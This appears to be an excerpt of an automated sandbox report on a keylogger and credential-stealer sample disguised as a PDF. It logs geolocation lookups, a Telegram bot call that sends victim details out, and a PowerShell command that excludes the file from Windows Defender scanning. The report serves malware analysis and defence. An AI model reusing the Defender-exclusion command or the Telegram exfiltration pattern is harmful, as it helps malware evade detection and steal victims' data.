    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f353a47bb501885-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1487&rtt_var=568&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1909744&cwnd=193&unsent_bytes=0&cid=83887aa349bbcded&ts=454&x=0"
2024-12-17 07:33:54 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49714 | 172.67.177.134 | 443 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:33:57 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-17 07:33:57 UTC | 876 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 07:33:57 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 409606
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=htqgcChm4%2F6SlMmQ5qnIVL%2FR51ggXgNy1suzapG2DQPnr0A1d1kHXIpfMHpbWjE85wKEBX%2BjVfjAYKzZHw0skFTvPelt8IscxggwTY0Hjh5wpO2TwZJ2iljKhNVXx1xc9NwytUfD"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f353a59de5c0f6b-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1457&min_rtt=1450&rtt_var=557&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1938911&cwnd=210&unsent_bytes=0&cid=c11990eb21b8391c&ts=450&x=0"
2024-12-17 07:33:57 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.749716172.67.177.1344436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:34:00 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
2024-12-17 07:34:00 UTC | 886 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:00 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409609
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PikA4I6auE%2Fx74oxsj7bSmBgTlcLXqA%2BVdma%2FfQ%2FOwILy3wgPtw%2BhFPS2G%2BIdgd7TjbLakkDL%2Ff5R4nmssaDgJ0BNyWRru43JtN6rToDKMjhkRvlsEiwSrRggjGbUTmHXW%2F9jS5u"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353a6bdc534406-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1552&rtt_var=593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1827284&cwnd=186&unsent_bytes=0&cid=815026d24e3a4198&ts=450&x=0"
2024-12-17 07:34:00 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49718 | 172.67.177.134 | 443 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:34:02 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
2024-12-17 07:34:03 UTC | 874 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:03 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409612
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJ9pXpb%2BcRSSOohvr4NFCFYhoyYnbLJw8ELaYfmTtjF0A65qz6gpLdHfmeO9RrDQPQYed1RmrdtlIxEe9kVHcg5dMEclGG%2BahhPUUMDhlgrFwMjA1r2XdijBnpP5zEDaEv43DxQp"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353a7e5a897d02-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=1999&rtt_var=811&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1300089&cwnd=230&unsent_bytes=0&cid=74d5560dc9480bc0&ts=451&x=0"
2024-12-17 07:34:03 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49723 | 172.67.177.134 | 443 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:34:05 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
2024-12-17 07:34:06 UTC | 878 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:06 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409615
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2iFU7L7fHO6AQkjOlMWEjplHLeJ0PJZhy%2FjZtyazQ22OrbggP8WpwufrylMjRYyf6j%2FSc46kyDQMYaAqhNHD%2FjnHtcmsas6oYeQ0HHX2%2ByDK5F7uOCvxvCfkE9Lpz1Ge4ksdhPY"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353a92a93b42d1-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1705&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1666666&cwnd=194&unsent_bytes=0&cid=f32f40dbdc124d1c&ts=828&x=0"
2024-12-17 07:34:06 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49727 | 172.67.177.134 | 443 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:34:09 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
2024-12-17 07:34:09 UTC | 876 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:09 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409618
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qTxNiZaHEUXqeu4nCkyO%2F2DoCskGWYSIVLprypkQQa8T6oXlke2FCsbjyEBZ4s%2F7FQO%2BymzBtDkGefwBeoagw4CH3OR1qR3vEDbUXssJwkUyavJt4t7yZ5B9YRiGnygViJSYTiYA"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353aa50cd00f9b-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1649&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1756919&cwnd=217&unsent_bytes=0&cid=87107b4ca108d9bb&ts=451&x=0"
2024-12-17 07:34:09 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49729 | 172.67.177.134 | 443 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:34:12 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
2024-12-17 07:34:12 UTC | 880 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:12 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409621
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqiruQ%2BVwDyc4qyLbR0cHWB00hq1o5IV4u611XU4h5FoNqO%2BMzVFOw7DfpFCNt7MNZKHj4%2FVkNv%2BmGofUOl9cj7swWjo30LS4f153vhyhO3pETTljLonrzfGGp%2F2I5kkbt9Ql3xk"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353ab7ade7430f-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1599&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1826141&cwnd=214&unsent_bytes=0&cid=3fc07d45062eda64&ts=449&x=0"
2024-12-17 07:34:12 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49731 | 172.67.177.134 | 443 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:34:15 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
2024-12-17 07:34:16 UTC | 879 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:16 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409625
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mclqdfPezVSG7ErPRw7Stq%2FWYDhMNTXTa592r5Vj2aB9Ig%2FJMjfUKYNWp5LnI0ombgq1m3ATDLYUTOIbXskye3dUlQ07g2gQL50%2BOwkbv1ASNCPJcBOsFWq3vcYBNKiK8fu%2FvdiX"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353ace0a5e42d5-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=9602&min_rtt=1766&rtt_var=5473&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1653454&cwnd=218&unsent_bytes=0&cid=d4fac11b2c811c5c&ts=452&x=0"
2024-12-17 07:34:16 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49733 | 149.154.167.220 | 443 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:34:18 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2018/12/2024%20/%2003:49:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                      Host: api.telegram.org
                                                                                                      Connection: Keep-Alive
2024-12-17 07:34:18 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.18.0
                                                                                                      Date: Tue, 17 Dec 2024 07:34:18 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Content-Length: 55
                                                                                                      Connection: close
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 07:34:18 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Target ID: 0
Start time: 02:33:44
Start date: 17/12/2024
Path: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
Imagebase: 0xb40000
File size: 907'264 bytes
MD5 hash: 68DFD91FCE9AD3D728A7C25716990EDD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

                                                                                                      Target ID:3
                                                                                                      Start time:02:33:46
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                                                                                                      Imagebase:0x1c0000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:02:33:46
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                                                                                                      Imagebase:0x5b0000
                                                                                                      File size:907'264 bytes
                                                                                                      MD5 hash:68DFD91FCE9AD3D728A7C25716990EDD
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
